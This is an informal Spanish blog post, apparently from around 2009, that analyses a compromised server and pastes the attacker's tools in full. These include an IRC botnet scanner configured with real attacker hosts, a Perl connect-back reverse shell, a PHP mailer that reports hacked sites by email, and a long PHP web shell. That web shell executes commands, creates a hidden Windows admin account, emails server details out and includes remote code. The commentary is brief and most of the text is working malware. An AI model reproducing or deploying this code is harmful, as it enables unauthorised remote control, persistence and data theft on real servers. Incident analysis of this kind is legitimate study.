Security Dojo » » linkedin http://security-dojo.com Mandando tus logs a /dev/null desde 1976 Wed, 04 Aug 2010 04:29:32 +0000 http://wordpress.org/?v=2.9.2 en hourly 1 Analisis de una Intrusion y un bot http://security-dojo.com/programming-bits/analisis-de-una-intrusion-y-un-bot/ http://security-dojo.com/programming-bits/analisis-de-una-intrusion-y-un-bot/#comments Tue, 20 Jan 2009 01:52:16 +0000 nahual http://security-dojo.com/?p=33 Est es una mini caso de estudio sobre lo que encontre hace poco en un servidor que tuvo una intrusion, veian como se cargaba el servidor en CPU y memoria y obviamente se cargaba por el acceso a I/O y todos los procesos de escan que hacian sin piedad, donde quedaron los tiempos donde tenias hackers que eran INVISIBLES y no inservibles? pero bueno que se yo no? jajajajaja

Bueno me toco ayudar a una persona que le hicieron una intrusion con inclusion de codigo, es bastante interesante porque se vio ejecutar perl Scan009.txt que me llamo la atencion y lo consegui del sitio donde bajo el botnet el ataque:

http://matudesign.com/dh/imagenes/Scan2009.txt

#!/usr/bin/perl

  ##################################################################
  ##                                                                                 ##
  ##                                                                                 ##
  ##                                                                   05/06/2008    ##
  ##  Author  : BitchX and Osirys                                                    ##                                                             ##
  ##  Team    : FullNetWork                                                          ##
  ##  Ircd    : irc.fullnetwork.org                                                  ##
  ##  WebSite :                                                                      ##
  ##  Contact : safes[dot]modes[at]gmail[dot]com                                     ##
  ##                                                                                 ##
  ##                                                                                 ##
  ##  Release: v1 Private                                                            ##
  ##                                                                                 ##
  ##                                                                                 ##
  #####################################################################################

### !!_/ PRIVATE

use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;

#######################################################
## CONFIGURATION                                     //
#######################################################

my $id    = "http://matudesign.com/dh/imagenes/02.txt??"; #Your RFI Response
#Shell printed on the Vulnerable Site
my $shell = "http://matudesign.com/dh/imagenes/cmd-shell.txt??";
my $ircd  = "64.136.61.195";
my $port  = "7000";
my $chan1 = "#offspring"; #Chan for Scan
my $chan2 = "#offspring"; #bot will be printed here too
my $nick  = "[D]PRIVATE".(int(rand(100)));
my $sqlpidpr0c = 1; # This is the number of sites that the bot will test in the same time.
#For an accurated scann, it's reccomended to set a low number(1)
# (Expecially if you are scanning on 0day bugs), so a lot of presunted vulnerable sites.
#Unless you will see the bot exiting by an excess flood!
# Instead, if you are scaning on old bugs, so not many results,
# you can put a higher number, so more speed.
my $rfipidpr0c = 50;
my @User_Agent = &Agent();

### USEFULL OPTIONS ( 0 => OFF  ;  1 => ON )

my $spread = "http://matudesign.com/dh/imagenes/01.txt??";

my $spreadACT = 0; #0 ->disabled, 1 ->enabled
my $securityACT = 0; #0 ->disabled, 1 ->enabled

my $killpwd = "lol"; #Password to Kill the Bot
my $chidpwd = "lol"; #Password to change the RFI Response
my $cmdpwd = "lol"; #Password to execute commands on the server
my $secpwd = "lol";
my $spreadpwd = "lol";

my $badspreadpwd != $spreadpwd;
my $badkillpwd != $killpwd;
my $badidpwd != $chidpwd;
my $badcmdpwd =! $cmdpwd;

#######################################################
## END OF CONFIGURATION                              //
#######################################################

open( $f1le, ">", "rm.txt" );
print $f1le "\#!/usr/bin/perl\n";
print $f1le "exec(\"rm -rf \*siti\*\")\;\n";
close $f1le;

my $sys = `uname -a`;
my $up = `uptime`;

if ($spreadACT == 0) {
    $t5 = "OFF";
}
elsif ($spreadACT == 1) {
    $t5 = "ON";
}

if ($securityACT == 0) {
    $y5 = "OFF";
}
elsif ($securityACT == 1) {
    $y5 = "ON";
}

$k=0;

if ( fork() == 0 ) {
    &irc( $ircd, $port, $chan1, $chan2, $nick );
}
else {
    exit;
}

... LONG BORING CODE AVAILABLE ON DEMAND ...

## PRIVATE
## Coded by BitchX and Osirys

Este script esta intersante, esta hecho para tomar comandos desde IRC para hacer scans masivos, infectar mas servers y agregarlos dentro de la botnet y reportarse (me encantaron sobre todo los passwords en los que podemos tomar control de la botnet nosotros mismos) asi tambien agregaron y ejecutaron los siguientes scripts:

http://matudesign.com/dh/imagenes/02.txt

#!/usr/bin/perl

use IO::Socket;

#IRAN HACKERS SABOTAGE Connect Back Shell          

#code by:LorD

#We Are :LorD-C0d3r-NT                                           

#Email:LorD@ihsteam.com

#

#lord@SlackwareLinux:/home/programing$ perl dc.pl

#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--

#

#Usage: dc.pl [Host] [Port]

#

#Ex: dc.pl 127.0.0.1 2121

#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121

#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--

#

#[*] Resolving HostName

#[*] Connecting... 127.0.0.1

#[*] Spawning Shell

#[*] Connected to remote host

#bash-2.05b# nc -vv -l -p 2121

#listening on [any] 2121 ...

#connect to [127.0.0.1] from localhost [127.0.0.1] 32769

#--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--

#

#--==Systeminfo==--

#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux

#

#--==Userinfo==--

#uid=1001(lord) gid=100(users) groups=100(users)

#

#--==Directory==--

#/root

#

#--==Shell==--

#

$system	= '/bin/sh';

$ARGC=@ARGV; 

print "--== ConnectBack Backdoor Shell vs 1.0 by xiP / eu kero comprar meu carroOOOo..!!! ==-- \n\n"; 

if ($ARGC!=2) { 

   print "Usage: $0 [Host] [Port] \n\n"; 

   die "Ex: $0 127.0.0.1 2121 \n"; 

} 

use Socket; 

use FileHandle; 

socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n"; 

connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n"; 

print "[*] Olhando o servidor...\n";

print "[*] ConectandO... $ARGV[0] \n"; 

print "[*] Spawning Shell \n";

print "[*] Connected to remote host \n";

SOCKET->autoflush(); 

open(STDIN, ">&SOCKET"); 

open(STDOUT,">&SOCKET"); 

open(STDERR,">&SOCKET"); 

print "--== ConnectBack Backdoor vs 1.0 by by xiP / eu kero comprar meu carroOOOo..!!! ==--  \n\n"; 

system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;

echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- "); 

system($system);

#EOF

Ojo con el MAESTRO del system (me preugnto yo para que hacer tanto show y que pasa si no esta el command o peor eso se ve fuertisimo pero bueno no podemos pedir demaciado, jejejejeje

Y esta preciosura tambien:


 
TAG html TAG
TAG head TAG
TAG meta content="text/html; charset=ISO-8859-1" http-equiv="content-type" TAG
TAG /head TAG
TAG body TAG

';
 mail("math3us1m@hotmail.com", $asunto, $msg, $cabeceras);
 ?>



Manda un email a math3us1m@hotmail.com avisandole del hack, mandemosles muchos y muchos correos de hack! jajajaja porque no?


Y para mantener el control usan: http://matudesign.com/dh/imagenes/cmd-shell.txt


TAG html TAG
TAG head>
TAG meta http-equiv="Content-Language" content="pt-br">
TAG meta name="GENERATOR" content="Microsoft FrontPage 5.0">
TAG meta name="ProgId" content="AoD">
TAG meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
TAG title>My life is Crazy Man TAG/title>
TAG style type="text/css">
A:link {text-decoration:none}
A:visited {text-decoration:none}
A:hover {text-decoration:underline}
A:active {text-decoration:underline}
body,td {
 font-family: verdana;
 font-size: 8pt;
 background-color: #006600;
}
a{
 color: #0000FF;
 text-decoration: none;
}
a:hover {
 color: #FF0000;
 text-decoration: underline;
}
TAG /style>
TAG /head>
TAG body >
TAG center>

 --== ?YOUNGEST? Hack Shell==-- 



TAG ?php

 @set_time_limit(0);

 $string = $_SERVER['QUERY_STRING'];
 $mhost = 'http://www.freewebs.com/segunogunyemi/derrr.jpg?';
 $host_all = explode("$mhost", $string);
 $s1 = $host_all[0];
 $fstring = $_SERVER['PHP_SELF']."?".$s1.$mhost;

 $OS = @PHP_OS;
 $IpServer = '127.0.0.1';
 $UNAME = @php_uname();
 $PHPv = @phpversion();
 $SafeMode = @ini_get('safe_mode');

 if ($SafeMode == '') { $SafeMode = "OFF"; }
 else { $SafeMode = "$SafeMode"; }

 $btname = 'backtool.txt';
 $bt = 'http://www.smashed-radio.com/forum/cmds.txt';
 $dc = 'http://www.smashed-radio.com/forum/cmds.txt';
 $newuser = '@echo off;net user Admin /add /expires:never
/passwordreq:no;net localgroup

"Administrators" /add Admin;net localgroup "Users" /del
Admin';
 $bn = 'http://www.smashed-radio.com/forum/cmds.txt';
// Java Script
 echo "TAG script type=\"text/javascript\">";

 echo "function ChMod(chdir, file) {";
 echo "var o = prompt('Chmod: - Contoh: 0777', '');";
 echo "if (o) {";
 echo "window.location=\"\" + '{$fstring}&action=chmod&chdir=' + chdir +
'&file=' + file +

'&chmod=' + o + \"\";";
 echo "}";
 echo "}";
 echo "function Rename(chdir, file, mode) {";
 echo "if (mode == 'edit') {";
 echo "var o = prompt('Ganti Nama File '+ file + ' menjadi:', '');";
 echo "}";
 echo "else {";
 echo "var o = prompt('Ganti Nama Folder '+ file + ' menjadi:', '');";
 echo "}";
 echo "if (o) {";
 echo "window.location=\"\" + '{$fstring}&action=rename&chdir=' + chdir +
'&file=' + file +

'&newname=' + o + '&mode=' + mode +\"\";";
 echo "}";
 echo "}";
 echo "function Copy(chdir, file) {";
 echo "var o = prompt('Copied for:', '/tmp/' + file);";
 echo "if (o) {";
 echo "window.location=\"\" + '{$fstring}&action=copy&chdir=' + chdir +
'&file=' + file +

'&fcopy=' + o + \"\";";
 echo "}";
 echo "}";
 echo "function Mkdir(chdir) {";
 echo "var o = prompt('Nama Folder?', 'Folder_Baru');";
 echo "if (o) {";
 echo "window.location=\"\" + '{$fstring}&action=mkdir&chdir=' + chdir +
'&newdir=' + o +

\"\";";
 echo "}";
 echo "}";
 echo "function Newfile(chdir) {";
 echo "var o = prompt('Nama File?', 'File_Baru.txt');";
 echo "if (o) {";
 echo "window.location=\"\" + '{$fstring}&action=newfile&chdir=' + chdir +
'&newfile=' + o +

\"\";";
 echo "}";
 echo "}";
 echo "";

 // End JavaScript

 /* Functions */
 function cmd($CMDs) {
 $CMD[1] = '';
 exec($CMDs, $CMD[1]);
 if (empty($CMD[1])) {
  $CMD[1] = shell_exec($CMDs);
 }
  elseif (empty($CMD[1])) {
  $CMD[1] = passthru($CMDs);
 }
 elseif (empty($CMD[1])) {
  $CMD[1] = system($CMDs);
 }
 elseif (empty($CMD[1])) {
  $handle = popen($CMDs, 'r');
  while(!feof($handle)) {
   $CMD[1][] .= fgets($handle);
  }
  pclose($handle);
 }
 return $CMD[1];
 }

if (@$_GET['chdir']) {
 $chdir = $_GET['chdir'];
} else {
  $chdir = getcwd()."/";
 }
if (@chdir("$chdir")) {
 $msg = "TAG font color=\"#008000\"> Pintu Masuk ke Direktori, OK!";
} else {
 $msg = "TAG font color=\"#FF0000\">Error: Gagal masukkan ke folder!";
 $chdir = str_replace($SCRIPT_NAME, "", $_SERVER['SCRIPT_NAME']);
}
 $chdir = str_replace(chr(92), chr(47), $chdir);

if (@$_GET['action'] == 'upload') {
 $uploaddir = $chdir;
 $uploadfile = $uploaddir. $_FILES['userfile']['name'];
 if (@move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir .

$_FILES['userfile']['name'])) {
 $msg = "TAG font color=\"#008000\">TAG font color=\"#000080\">{$_FILES['userfile']['name']}, Upload File Berjaya.

";
 } else {
   $msg = "TAG font color=\"#FF0000\">Error: Upload File Gagal.";
  }
}
elseif (@$_GET['action'] == 'mkdir') {
   $newdir = $_GET['newdir'];
   if (@mkdir("$chdir"."$newdir")) {
    $msg = "TAG font color=\"#008000\">TAG font color=\"#000080\">{$newdir}, folder

berhasil dibuat. ";
   } else {
      $msg = "TAG font color=\"#FF0000\">Error: Pembuatan folder
gagal.";
     }
}
elseif (@$_GET['action'] == 'newfile') {
   $newfile = $_GET['newfile'];
   if (@touch("$chdir"."$newfile")) {
    $msg = "TAG font color=\"#008000\">TAG font color=\"#000080\">{$newfile}, berhasil

dibuat! ";
   } else {
      $msg = "TAG font color=\"#FF0000\">Error: Tak Boleh Buat File!";
     }
}

elseif (@$_GET['action'] == 'del') {
    $file = $_GET['file']; $type = $_GET['type'];
    if ($type == 'file') {
     if (@unlink("$chdir"."$file")) {
      $msg = "TAG font color=\"#008000\">TAG font color=\"#000080\">{$file}, Berhasil

menghapus arsip (file)!";
     } else {
        $msg = "TAG font color=\"#FF0000\">Error: Gagal menghapuskan File
(file)!";
       }
    } elseif ($type == 'dir') {
       if (@rmdir("$chdir"."$file")) {
         $msg = "TAG font color=\"#008000\">TAG font color=\"#000080\">{$file}, Berhasil

menghapus folder!";
       } else {
          $msg = "TAG font color=\"#FF0000\">Error: Gagal menghapuskan
folder!";
         }
      }
}
elseif (@$_GET['action'] == 'chmod') {
    $file = $chdir.$_GET['file']; $chmod = $_GET['chmod'];
    if (@chmod ("$file", $chmod)) {

     $msg = "TAG font color=\"#008000\">Chmod dari TAG font color=\"#000080\">{$_GET['file']} TAG font color=\"#008000\">berubah
menjadi

TAG font color=\"#000080\">$chmod TAG font color=\"#008000\">:
Sukses!";
    } else {
       $msg = 'TAG font color=\"#FF0000\">Error: Gagal mengubah
chmod.';
      }
}
elseif (@$_GET['action'] == 'rename') {
    $file = $_GET['file']; $newname = $_GET['newname'];
    if (@rename("$chdir"."$file", "$chdir"."$newname")) {
     $msg = "TAG font color=\"#008000\">Archive TAG font color=\"#000080\">{$file}

TAG font color=\"#008000\">named for TAG font color=\"#000080\">{$newname} TAG font color=\"#008000\">successfully!";
    } else {
       $msg = "TAG font color=\"#FF0000\">Error: Gagal menukar File.";
      }
}
elseif (@$_GET['action'] == 'copy') {
   $file = $chdir.$_GET['file']; $copy = $_GET['fcopy'];
   if (@copy("$file", "$copy")) {
    $msg = "TAG font color=\"#000080\">{$file}, TAG font color=\"#008000\">disalin

menjadi TAG font color=\"#000080\">{$copy} TAG font color=\"#008000\">

Berhasil!";
   } else {
      $msg = "TAG font color=\"#FF0000\">Error: Gagal menyalin  TAG font color=\"#000000\">{$file} TAG font color=\"#FF0000\">menjadi
TAG font color=\"#000000\">{$copy}";
     }
}
/* Parte Atualiza 02:48 12/2/2006 */

elseif (@$_GET['action'] == 'cmd') {
 if (!empty($_GET['cmd'])) { $cmd = @$_GET['cmd']; }
 if (!empty($_POST['cmd'])) { $cmd = @$_POST['cmd']; }
 $cmd = stripslashes(trim($cmd));
 $result_arr = cmd($cmd);

 $afim = count($result_arr); $acom = 0; $msg = '';
 $msg .= "

Hasil : ".$cmd."

";
 if ($result_arr) {
 while ($acom <= $afim) {
  $msg .= "

 ".@$result_arr[$acom]."

";
 $acom++;
  }
 }
 else {
 $msg .= "

Error: Gagal Menjalankan perintah.

";
 }
}
elseif (@$_GET['action'] == 'safemode') {
if (@!extension_loaded('shmop')) {
 echo "Loading... module
";

   if (strtoupper(substr(PHP_OS, 0,3) == 'WIN')) {
       @dl('php_shmop.dll');
   } else {
       @dl('shmop.so');
   }
}

if (@extension_loaded('shmop')) {
 echo "Module: shmop loaded!
";

 $shm_id = @shmop_open(0xff2, "c", 0644, 100);
 if (!$shm_id) { echo "Couldn't create shared memory segment\n"; }
 $data="\x00";
 $offset=-3842685;
 $shm_bytes_written = @shmop_write($shm_id, $data, $offset);
 if ($shm_bytes_written != strlen($data)) { echo "Couldn't write the entire
length of

data\n"; }
 if (!shmop_delete($shm_id)) { echo "Couldn't mark shared memory block for
deletion."; }
 echo passthru("id");
 shmop_close($shm_id);

} else { echo "Module: shmop tidak dimuat!
"; }
}

elseif (@$_GET['action'] == 'zipen') {
 $file = $_GET['file'];
 $zip = @zip_open("$chdir"."$file");
 $msg = '';
if ($zip) {

   while ($zip_entry = zip_read($zip)) {
       $msg .= "Name:               " . zip_entry_name($zip_entry) . "\n";
       $msg .= "Actual Filesize:    " . zip_entry_filesize($zip_entry) .
"\n";
       $msg .= "Compressed Size:    " .
zip_entry_compressedsize($zip_entry) . "\n";
       $msg .= "Compression Method: " .
zip_entry_compressionmethod($zip_entry) . "\n";

       if (zip_entry_open($zip, $zip_entry, "r")) {
           echo "File Contents:\n";
           $buf = zip_entry_read($zip_entry,
zip_entry_filesize($zip_entry));
           echo "$buf\n";

           zip_entry_close($zip_entry);
       }
       echo "\n";

   }

   zip_close($zip);

}
}
elseif (@$_GET['action'] == 'edit') {
 $file = $_GET['file'];
 $conteudo = '';
 $filename = "$chdir"."$file";
 $conteudo = @file_get_contents($filename);
 $conteudo = htmlspecialchars($conteudo);
 $back = $_SERVER['HTTP_REFERER'];
 echo "

Editing {$file} ...

";
 echo "
";
 echo "
";
 echo "


";
 echo "

";
 echo "
";
 echo "

";
 echo "

";
 print "

";
 echo "

";
 echo "
 ";
 echo "
 ";
 echo "


";
 echo "


";
}
elseif (@$_GET['action'] == 'save') {
  $filename = "$chdir".$_GET['file'];
  $somecontent = $_POST['S1'];
  $somecontent = stripslashes(trim($somecontent));
  if (is_writable($filename)) {
   @$handle = fopen ($filename, "w");
   @$fw = fwrite($handle, $somecontent);
   @fclose($handle);
   if ($handle && $fw) {
    $msg = "TAG font color=\"#000080\">{$_GET['file']}, TAG font color=\"#008000\">berhasil diedit!";
   }
 } else {
   $msg = "TAG font color=\"#000000\">{$_GET['file']}, TAG font color=\"#FF0000\">tidak

bisa ditulisi!";
  }
}

// Informa?s
 $cmdget = '';
 if (!empty($_GET['cmd'])) { $cmdget = @$_GET['cmd']; }
 if (!empty($_POST['cmd'])) { $cmdget = @$_POST['cmd']; }
 $cmdget = htmlspecialchars($cmdget);
 function asdads() {
 $asdads = '';
 if (@file_exists("/usr/bin/wget")) { $asdads .= "wget "; }
 if (@file_exists("/usr/bin/fetch")) { $asdads .= "fetch "; }
 if (@file_exists("/usr/bin/curl")) { $asdads .= "curl "; }
 if (@file_exists("/usr/bin/GET")) { $asdads .= "GET "; }
 if (@file_exists("/usr/bin/lynx")) { $asdads .= "lynx "; }
 return $asdads;
 }

echo "

";
echo "

";
echo "
Informasi

";
echo "
";
echo "
";
echo "


 ";
echo "


";
echo "

";
echo "
";
echo "


 ";
echo "


";
echo "

";
echo "
";
echo "


 ";
echo "


";
echo "

";
 if (strtoupper(substr($OS, 0,3) != 'WIN')) {
 $Methods = asdads();
 if ($Methods == '') { $Methods = "???"; }
 echo "
";
 echo "


 ";
 echo "


";
 echo "

";
 }

echo "
";
echo "


 ";
echo "


";
echo "

";
echo "
";
echo "


 ";
echo "


";
echo "

";
echo "
";
echo " Sistem  : {$OS}
";
echo " Nama : {$UNAME}
";
echo " PHP : {$PHPv},  Safe Mode : {$SafeMode}
";
 echo "Methods : {$Methods}
";
echo " IP : {$IpServer}
";
echo " Perintah :




";
echo "




";
// Dir

echo "

";
echo "

";
if (is_writable("$chdir")) {
 if (strtoupper(substr($OS, 0,3) == 'WIN')) {
 echo "
Dir YES: {$chdir} - Folder Baru | File Baru | Remote

Access

";
 } else {
   echo "
Dir YES: {$chdir} - Folder Baru | File Baru | Kembali";
  }
}
else {
if (strtoupper(substr($OS, 0,3) == 'WIN')) {
 echo "
Dir NO: {$chdir} - Foldr Baru | File Baru | Remote

Access

";
 } else {
   echo "
Dir NO: {$chdir} - Folder Baru | File Baru | Kembali

";
  }
}

if (@!$handle = opendir("$chdir")) {
 echo " Gue gak bisa masuk folder, Klik sini!
untuk Kembali ke folder ori!
";
}
else {
echo "
";
echo "
";
echo "


";
echo "    

";
echo "
";
echo "


";
echo "    

";
echo "
";
echo "


";
} else {
  echo "

$msg

";
 }
echo "    


";
echo "
";
echo "


";
echo "    
 Upload:";
echo "
";
echo "

 
";
if (@!$msg) {
 echo "

Messages
 




 ";
echo "
";
echo "
 ";
echo "


";
echo "


";
echo "


";
echo "


";
echo "     

";
$colorn = 0;
   while (false !== ($file = readdir($handle))) {
       if ($file != '.') {
           if ($colorn == 0) {
            $color = "style=\"background-color: #FF9900\"";
           }
           elseif ($colorn == 1) {
            $color = "style=\"background-color:  #FFCC33\"";
           }
           if (@is_dir("$chdir"."$file")) {
            $file = $file.'/';
            $mode = 'chdir';
           } else {
              $mode = 'edit';
            }
           if (@substr("$chdir", strlen($chdir) -1, 1) != '/') {
             $chdir .= '/';
           }
           if ($file == '../') {
            $lenpath = strlen($chdir); $baras = 0;
            for ($i = 0;$i < $lenpath;$i++) { if ($chdir{$i} == '/') {
$baras++; } }
            $chdir_ = explode("/", $chdir);
            $chdirpox = str_replace($chdir_[$baras-1].'/', "", $chdir);
           }
           $perms = @fileperms ("$chdir"."$file");
           if ($perms == '') {
            $perms = '???';
           }
           $size = @filesize ("$chdir"."$file");
           $size = $size / 1024;
           $size = explode(".", $size);
           if (@$size[1] != '') {
            $size = $size[0].'.'.@substr("$size[1]", 0, 2);
           } else {
              $size = $size[0];
            }
           if ($size == 0) {
            if ($mode == 'chdir') {
             $size = '???';
            }
           }
           echo "
";
    echo "


";
           if (@is_writable ("$chdir"."$file")) {
            if ($mode == 'chdir') {
             if ($file == '../') {
              echo "


";
             } else {
                echo "


";
               }
            } else {
 if (is_readable("$chdir"."$file")) {
                echo "


";
               } else {
                  echo "


";
                 }
              }
           }
          else {
            if ($mode == 'chdir') {
             if ($file == '../') {
              echo "


";
             } else {
                echo "


";

              }
            } else {
 if (@is_readable("$chdir"."$file")) {
                echo "


";
               } else {
                  echo "


";
                }
              }
            }
           echo "


";
           if ($mode == 'edit') {
            echo "


";
           } else {
              echo "


";
             }
           echo "

";
           if ($colorn == 0) {
            $colorn = 1;
           }
           elseif ($colorn == 1) {
            $colorn = 0;
           }
       }
   }
   closedir($handle);
}

 $OS = @PHP_OS;
 $UNAME = @php_uname();
 $PHPv = @phpversion();
 $SafeMode = @ini_get('safe_mode');

 if ($SafeMode == '') { $SafeMode = "OFF
"; }
 else { $SafeMode = "$SafeMode
"; }

 $injek=($_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);

 $psn=("OS = " . $OS . "
UNAME = " . $UNAME . "
PHPVersion = " .
$PHPv . "
Safe

Mode = " . $SafeMode . "
TAG font color=blue>http://" . $injek .
"
Ingat jangan

Guna Target Ini.
By: NABIL");

 $header = "From: $_SERVER[SERVER_ADMIN] <$from>\r\nReply-To:
$replyto\r\n";
 $header .= "MIME-Version: 1.0\r\n";
 If ($file_name) $header .= "Content-Type: multipart/mixed;
boundary=$uid\r\n";
 If ($file_name) $header .= "--$uid\r\n";
 $header .= "Content-Type: text/$contenttype\r\n";
 $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
 $header .= "$message\r\n";
 If ($file_name) $header .= "--$uid\r\n";
 If ($file_name) $header .= "Content-Type: $file_type;
name=\"$file_name\"\r\n";
 If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
 If ($file_name) $header .= "Content-Disposition: attachment;

filename=\"$file_name\"\r\n\r\n";
 If ($file_name) $header .= "$content\r\n";
 If ($file_name) $header .= "--$uid--";
 $to = ("haumil@gmail.com");
 $subject = ("Inbox linda.");
 mail($to,$subject,$psn,$header);

@include "$bn";
?>
 
 Permision Nama File  Kapasiti  Perintah
 $perms TAG font color=\"#008000\">$file  TAG font color=\"#008000\">$file  TAG a href=\"{$fstring}&action=edit&chdir=$chdir&file=$file\">$file
 $file  $file
 $file $file
 $file $size KB Rename | Del

| Chmod | Copy  Rename | Del

| Chmod | Copy














Esta un poco mejor shell99, pero tampoco esta mal, lo que si es que se ve que han tenido tiempo no para desarrollar sino para encontrar los scripts y usarlos, interesante se ve que hay una o 2 personas que mas o menos le dan a la codificacion en perl y un poco en PHP pero en realidad las botnets no estan muy desarrolladas.


Esta decente el botnet, se puede tomar control de ella y obvamente no hacen mucho por generar una botnet mas compleja y mas grande, sin embargo me da la idea para desarrollar una de prueba de concepto durante estas fechas que ando de relax de programar en python para pruebas de volumen.


Bueno despues de tanto codigo .. me lanzo ….

]]>
			http://security-dojo.com/programming-bits/analisis-de-una-intrusion-y-un-bot/feed/
		0